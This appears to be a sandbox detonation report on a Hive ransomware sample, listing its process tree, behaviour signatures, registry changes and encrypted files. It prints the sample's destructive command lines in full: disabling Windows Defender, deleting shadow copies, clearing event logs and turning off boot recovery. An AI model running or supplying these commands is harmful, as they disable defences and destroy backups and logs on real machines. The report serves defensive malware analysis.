Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2016 wrote to memory of 2084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2016 wrote to memory of 2084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2016 wrote to memory of 2084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2520 wrote to memory of 2924 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2520 wrote to memory of 2924 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2520 wrote to memory of 2924 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2596 wrote to memory of 2272 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2596 wrote to memory of 2272 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2596 wrote to memory of 2272 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2480 wrote to memory of 2876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2480 wrote to memory of 2876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2480 wrote to memory of 2876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2896 wrote to memory of 2908 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2896 wrote to memory of 2908 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2896 wrote to memory of 2908 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 3044 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3044 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3044 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2752 wrote to memory of 2856 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2752 wrote to memory of 2856 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2752 wrote to memory of 2856 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2840 wrote to memory of 2468 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2840 wrote to memory of 2468 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2840 wrote to memory of 2468 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/1796-7-0x000000001B670000-0x000000001B952000-memory.dmp

memory/1796-8-0x0000000002350000-0x0000000002358000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 8475082a9d89524049c6dde60cc961db
SHA1 8dc4c9fd3f006740eb7a56ef8046fb56bee3dee7
SHA256 b8a467b931a33241b57beaeb6f6b4938ff76e69e9f3b71dbd3734ca0108323dc
SHA512 edbd4942d7f65a7e772d2895556ff2af74740226620bafa7103bbf4f6f362af6a93c8c506ffc39e2d680ae1aed6a024fcc29ba9fce4e8f3b4b3c0f33fb5a3a32

memory/2908-14-0x000000001B610000-0x000000001B8F2000-memory.dmp

memory/2908-15-0x00000000028F0000-0x00000000028F8000-memory.dmp

C:\Program Files\phLK_HOW_TO_DECRYPT.txt

MD5 7c7498625660600d7277d186038c05fa
SHA1 144ea5eccf0824e9c30681f64c25224753886533
SHA256 1da21b2c48b5e60b2e6ced94b990c73a0644fc147cc13b38c022a9f1c058ad3c
SHA512 32ee4b3ba5a1c86ee47be70428204af3f30f865eba33693a235dd7c6ae51d33369b4a486ee41e837c8fbe117edf54ba0cd01b1535a369c14683ca833768d4e92

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-05 04:29

Reported

2024-12-05 04:32

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe"

Signatures

Disables service(s)

evasion execution

Hive

ransomware hive

Hive family

hive

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\SYSTEM32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SYSTEM32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\SYSTEM32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
N/A N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
N/A N/A C:\Windows\SYSTEM32\wevtutil.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Security services

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-pl.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_pcghlVrN2Ww0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_KMS_Client-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_dL7PZh3_fXw0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Dark\Sunset.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL__-uasMCwfIk0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-white_scale-100.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.strings.psd1.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_uTxmmQZZhek0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Gdd7-K-qt-A0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Lumia.AppTk.NativeDirect3d.UAP\Native3d.TextureRendererVertexShader.cso C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-72_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\de-DE\MSFT_PackageManagementSource.strings.psd1.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_3x3_1cL1yo40.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\2876_20x20x32.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
